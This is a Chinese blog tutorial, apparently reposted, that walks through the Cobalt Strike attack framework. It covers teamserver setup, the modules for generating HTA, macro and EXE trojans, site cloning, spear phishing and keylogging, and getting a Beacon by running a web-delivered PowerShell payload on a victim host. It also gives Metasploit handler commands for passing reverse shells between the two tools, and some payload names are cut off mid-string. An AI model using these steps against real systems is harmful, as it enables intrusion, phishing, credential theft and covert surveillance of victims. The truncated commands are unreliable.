linux cpu占用率如何看
336
2022-10-01
Cobalt Strike基本使用
Cobalt Strike简介
Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节,且其最大的优点在于可以进行团队合作和优越的UI界面。
Cobalt Strike文件结构
│ agscript 拓展应用的脚本│ c2lint 检查profile的错误异常│ cobaltstrike 客户端程序│ cobaltstrike.jar │ logs 日志│ data TeamServer的一些数据│ teamserver 团队服务器程序│ update 用于更新Cobalt Strike│ update.jar│ third-party 第三方工具
Cobalt Strike使用
CobaltStrike分为客户端和服务端,Cobalt Strike 需要团队服务器才能使用。
(1)启动TeamServer
./teamserver 192.168.178.128 123456 #ip为本机服务器ip 123456为设置的密码
如果要将团队服务器部署在公网上,记得加强密码强度,防止团队服务器密码被破解
(2)启动Cobalt Strike Client
Host为团队服务器ip地址Port为默认端口User为连接的用户,用户可以自行选择Password为团队服务器设置的密码
Cobalt Strike模块详解
Cobalt Strike模块
New Connection # 新建连接,支持连接多个服务器端Preferences # 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录Visualization # 主要展示输出结果的视图VPN Interfaces # 设置VPN接口Listenrs # 创建监听器Script Manager # 脚本管理,可以通过AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等Close # 退出连接
View模块
Applications # 显示受害主机的应用信息Credentials # 显示所有以获取的受害主机的凭证,如hashdump、MimikatzDownloads # 查看已下载文件Event Log # 主机上线记录以及团队协作聊天记录Keystrokes # 查看键盘记录结果Proxy Pivots # 查看代理模块Screenshots # 查看所有屏幕截图Script Console # 加载第三方脚本以增强功能 Targets # 显示所有受害主机Web Log # 所有Web服务的日志
Attacks模块
Packages
HTML Application # 生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件MS Office Macro # 生成office宏病毒文件Payload Generator # 生成各种语言版本的payloadWindows Executable # 生成可执行exe木马Windows Executable(Stageless) # 生成无状态的可执行exe木马
Web-Drive-by
Manage # 对开启的web服务进行管理Clone Site # 克隆网站,可以记录受害者提交的数据Host File # 提供文件下载,可以选择Mime类型Scripted Web Delivery # 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery Signed Applet Attack # 使用java自签名的程序进行钓鱼攻击(该方法已过时)Smart Applet Attack # 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)Spear Phish # 鱼叉钓鱼邮件
Reporting模块
Help模块
Homepage # 官方主页Support # 技术支持Arsenal # 开发者System information # 版本信息About # 关于
工具导航栏
1.新建连接2.断开当前连接3.监听器4.改变视图为Pivot Graph(视图列表)5.改变视图为Session Table(会话列表)6.改变视图为Target Table(目标列表)7.显示所有以获取的受害主机的凭证8.查看已下载文件9.查看键盘记录结果10.查看屏幕截图11.生成无状态的可执行exe木马12.使用java自签名的程序进行钓鱼攻击13.生成office宏病毒文件14.为payload提供web服务以便下载和执行15.提供文件下载,可以选择Mime类型16.管理Cobalt Strike上运行的web服务17.帮助18.关于
利用Cobalt Strike获取一个Beacon
1、创建Listener
然后输入名称(任意),选择监听器类型,团队服务器ip和监听端口保存即可。
然后在监听的面板中就可以看到我们的监听器
在有了监听器之后,我们就可以选择我们的攻击模块进行漏洞利用了。我们这里选择Scripted Web Delivery攻击模块(为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery)
然后会生成一个payload
复制payload在powershell中执行,肉鸡即可上线
我们可以进如Interact的交互模式进行执行命令
Cobalt Strike功能详解
Listeners(监听模块)
在监听模块中内置了八个内置payload
wndows/beacon_dns/reverse_dns_txtwindows/beacon_> use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_exploit(multi/handler) > set lhost 192.168.178.128 #此处的IP地址和监听端口要和cs中设置的保持一致msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > run
选择我们设置的msf这个外监听器
这样在msf这边就可以接受到cs这边传递过来的shell
这里讲述到了cs传递shell到msf,就不得不在提一提msf传递到cs了。
首先我们把刚才接受到的session退出,这里记住这个session的id为1
然后使用模块
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_ #切记这里的payload的协议要与cs的一致
选择上了这个模块之后我们在回到cs上创建一个监听器,我这里有个之前创建好的监听器
然后run执行在cs上等待上线即可。
Attacks(攻击模块)
Scripted Web Delivery
上面演示的是使用attacks模块中的scripted web delivery模块来进行拿到靶机的shell
这里有几个配置选项
URL Path:存放payload的位置Local Host:团队服务器ip地址Local Port:团队服务器端口Listener:监听器Type:要选择的脚本类型
在靶机上运行之后,靶机会在Teamserver下载payload,然后执行并加载到内存中,从而获取主机的Beacon。
Manage
我们生成的监听器和一些payload都能在这里进行管理。
Windows Executable
使用方法也和之前大致相同,配置好监听器和Output即可,这里的Output分为EXE和DLL两种类型。
Windows EXE:windows的可执行文件Windows Service EXE:基于服务的windows可执行文件,可以将可执行文件添加到服务中。Windows DLL:DLL文件,一般用于DLL劫持、提权和反弹Beacon。
Payload Generator
配置监听器,选择对应脚本语言即可。
__EOF__
作者: 随风kali
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~